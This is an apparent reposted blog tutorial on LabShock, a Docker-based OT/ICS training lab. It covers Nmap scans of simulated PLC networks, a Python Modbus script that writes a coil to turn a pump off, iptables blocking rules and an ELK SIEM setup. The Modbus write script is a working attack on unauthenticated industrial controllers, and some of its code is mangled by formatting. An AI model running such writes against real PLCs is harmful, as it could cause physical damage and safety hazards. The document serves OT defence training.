Listen to this Post
Introduction:
Operational Technology (OT) and Industrial Control Systems (ICS) are the backbone of critical infrastructure, yet they remain notoriously difficult to secure due to their unique protocols and safety constraints. Hands-on experience is crucial for defenders, but building a realistic industrial lab has traditionally required expensive, physical hardware. This is where LabShock, an open-source, Docker-based OT security lab developed by Zakhar Bernhardt, bridges the gap, allowing anyone to simulate, attack, and defend a virtual industrial plant from their laptop.
Learning Objectives:
- Set up a complete OT/ICS cybersecurity lab on your local machine using Docker and Linux commands.
- Perform network reconnaissance to discover industrial assets like PLCs, HMIs, and SCADA systems.
- Exploit unauthenticated industrial protocols (specifically Modbus) to manipulate physical processes.
- Implement defensive monitoring by integrating a SIEM and creating detection rules for OT-specific attacks.
You Should Know:
1. Deploying Your Virtual Industrial Control System
Before any hacking can occur, you need a target. The LabShock environment simulates a complete industrial network, including a Programmable Logic Controller (PLC), a SCADA/HMI interface, an engineering workstation, and an intrusion detection system (IDS). The entire lab is containerized using Docker, ensuring a lightweight, reproducible, and safe environment that can be spun up or torn down in minutes.
Step-by-step guide to install LabShock on Ubuntu/Debian:
This guide assumes you have a fresh Ubuntu VM (or native install) with `sudo` privileges.
1. Install Docker and Docker Compose:
The official script ensures you get the latest version. Run the following commands:
Update system and install prerequisites sudo apt update && sudo apt install -y ca-certificates curl gnupg lsb-release Add Docker's official GPG key and repository sudo install -m 0755 -d /etc/apt/keyrings curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo tee /etc/apt/keyrings/docker.asc > /dev/null echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null Install Docker and Docker Compose plugin sudo apt update && sudo apt install -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin Add your user to the docker group to run commands without sudo sudo usermod -aG docker $USER newgrp docker
2. Clone and Build the LabShock Environment:
Clone the official LabShock repository git clone https://github.com/zakharb/labshock.git cd labshock/labshock Build the Docker images and launch all containers in detached mode docker compose build docker compose up -d
What This Does: This process pulls and builds container images for each component (PLC, SCADA, Kali Linux, etc.) and configures their virtual network, effectively creating a mini-factory floor on your machine.
3. Access the Lab Components:
Once the containers are running, you can access the various web interfaces from your host browser:
Main Portal: `http://localhost`
OpenPLC (Target): `http://localhost:8080` (login: openplc/openplc)
FUXA HMI (SCADA Interface): `http://localhost:1881`
Engineering Workstation (Kali Linux): `http://localhost:5911/vnc.html` (no password required)
Pentest Station (SSH): `ssh pentest@localhost -p 2222` (password: pentest)
For a clean reset, use `docker compose down` followed by `docker compose up -d` to restart the lab.
2. Breaching the Perimeter: Reconnaissance of Industrial Networks
Once the lab is live, the first step for any red teamer is network discovery. OT networks often have a flat or segmented topology that can be mapped using standard tools from the provided pentest station.
Step-by-step guide to enumerating assets with Nmap:
Access the pentest station via SSH: `ssh pentest@localhost -p 2222` (password: pentest).
1. Map the Supervisory Network (Level 3):
This network contains the SCADA, HMI, and engineering workstations.
Perform a ping/ARP sweep to discover live hosts without port scanning sudo nmap -sn -PR 192.168.3.0/24 -oG l3_network.gnmap
Expected output: IPs like `192.168.3.11` (SCADA), `192.168.3.10` (EWS).
2. Map the Control Network (Level 2):
This is the critical field network where PLCs and other controllers reside. Use the router as a gateway.
Scan the lower network for live PLCs and RTUs sudo nmap -sn 192.168.2.0/24
Expected output: The primary PLC at `192.168.2.2` will respond.
3. Service Scan on a Discovered PLC:
Now that you have the target PLC’s IP (192.168.2.2), perform a service version scan to identify open ports and protocols.
sudo nmap -sV -p 502,44818,22,80 192.168.2.2
What This Does: This command checks for common OT ports. Port 502 is the default for Modbus TCP, an unauthenticated and highly vulnerable protocol widely used in ICS environments. Its presence is a green light for the next phase of the attack.
3. Exploiting Modbus: Manipulating Industrial Processes
The lack of authentication and encryption in legacy Modbus TCP is a critical vulnerability. An attacker with network access can read and write to a PLC’s coils and registers, directly controlling physical equipment like pumps, conveyors, or valves.
Step-by-step guide to reading and writing to a PLC using Python:
This script can be run from the pentest station or the Kali engineering workstation within LabShock.
1. Connect and Read Coil Values:
First, let’s establish a connection and read the status of the pump coils. Use the `pyModbus` library (pre-installed in the lab).
!/usr/bin/env python3
from pyModbusTCP.client import ModbusClient
PLC_IP = "192.168.2.2"
PORT = 502
Create a Modbus client
client = ModbusClient(host=PLC_IP, port=PORT, auto_open=True)
Read coils 0-9 (status of pumps 1-5, etc.)
coils = client.read_coils(0, 10)
if coils:
print(f"[] Current coil states: {coils}")
Example: Coil 0 -> Pump 1 (1 = ON, 0 = OFF)
print(f"[] Pump 1 status: {'ON' if coils[bash] else 'OFF'}")
else:
print("[!] Failed to read coils")
- Write to a Coil to Change Pump State:
Now, simulate an attacker’s goal to disrupt operations by turning off a pump.Assuming pump 1 is controlled by coil 0, set it to OFF (0) pump_to_control = 0 write_success = client.write_single_coil(pump_to_control, 0)</li> </ol> if write_success: print(f"[!] SUCCESS: Coil {pump_to_control} written. Pump 1 is now OFF.") Verify the change by reading again new_state = client.read_coils(0, 1) print(f"[] Verification: Pump 1 status is now {'ON' if new_state[bash] else 'OFF'}") else: print("[!] Write operation failed.")What This Does: This script directly interfaces with the PLC’s memory over the network, bypassing any higher-level SCADA logic. By turning a pump off or on, an attacker can cause physical damage, process disruption, or safety hazards. You can immediately see the change reflected on the SCADA HMI at `http://localhost:1881`.
4. Defensive Countermeasures: Hardening and Monitoring OT Environments
A robust defense requires preventing unauthorized access and rapidly detecting malicious activity. This involves network-level hardening and the deployment of a SIEM for log aggregation and alerting.
Step-by-step guide to implementing OT firewall rules and setting up a SIEM:
1. Network Hardening with `iptables`:
To block unauthorized Modbus traffic, we can apply a simple firewall rule on a jump box or the PLC’s gateway within the lab.
Block all incoming traffic to the default Modbus port sudo iptables -A INPUT -p tcp --dport 502 -j DROP Block EtherNet/IP traffic (another common industrial protocol) sudo iptables -A INPUT -p udp --dport 44818 -j DROP Verify the rules are in place sudo iptables -L INPUT -v -n
What This Does: These commands block access to critical industrial protocol ports from any unauthorized source. After applying this, re-run the Python exploit or an `nmap` scan to `192.168.2.2` to confirm the connection times out, effectively neutralizing the attack.
2. Proactive Detection with an OT SIEM:
LabShock includes a pre-configured ELK stack (Elasticsearch, Logstash, Kibana) for log centralization. The first step is to ensure it’s ingesting the right data.
From the LabShock directory, start the ELK stack components docker compose -f docker-compose-elk.yml up -d Configure Logstash to parse Modbus traffic logs (conceptual) The actual lab setup will have a pre-configured pipeline. Check the 'collector' container's logs to see incoming data. docker logs -f labshock-collector-1
What This Does: This spins up a SIEM that collects logs from the IDS and network sensors. Analysts can then create Kibana dashboards to visualize network traffic. For instance, an alert can be created for
tcp.port == 502, which, if triggered, would indicate an attempt to communicate with the PLC on a critical port, providing an early warning for the attack demonstrated in Section 3.What Undercode Say:
- Key Takeaway 1: The barrier to entry for OT security training is now virtually zero. Open-source platforms like LabShock democratize access to complex industrial environments, enabling anyone to gain hands-on experience without physical hardware or expensive licenses.
- Key Takeaway 2: Legacy industrial protocols like Modbus remain a critical vulnerability, as they lack basic security features like authentication and encryption. Practicing exploits and defenses in a safe sandbox is the most effective way to prepare for real-world assessments.
By combining accessible tools with practical exercises, the cybersecurity community can bridge the critical skills gap in OT/ICS security. The future of defending our power grids, water systems, and factories lies in platforms like LabShock, which transform theoretical knowledge into actionable, hands-on capability.
Prediction:
As open-source OT testbeds like LabShock mature, they will inevitably become standard components in both corporate training pipelines and academic curricula. This democratization will lead to a significant and rapid increase in the number of security professionals capable of performing competent OT assessments. However, it also lowers the barrier for threat actors, likely resulting in a short-term surge of “script-kiddie” style attacks against exposed industrial control systems, highlighting the urgent need for proactive defense-in-depth strategies.
▶️ Related Video (84% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Zakharb Labshock – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeTesting & Stay Tuned:
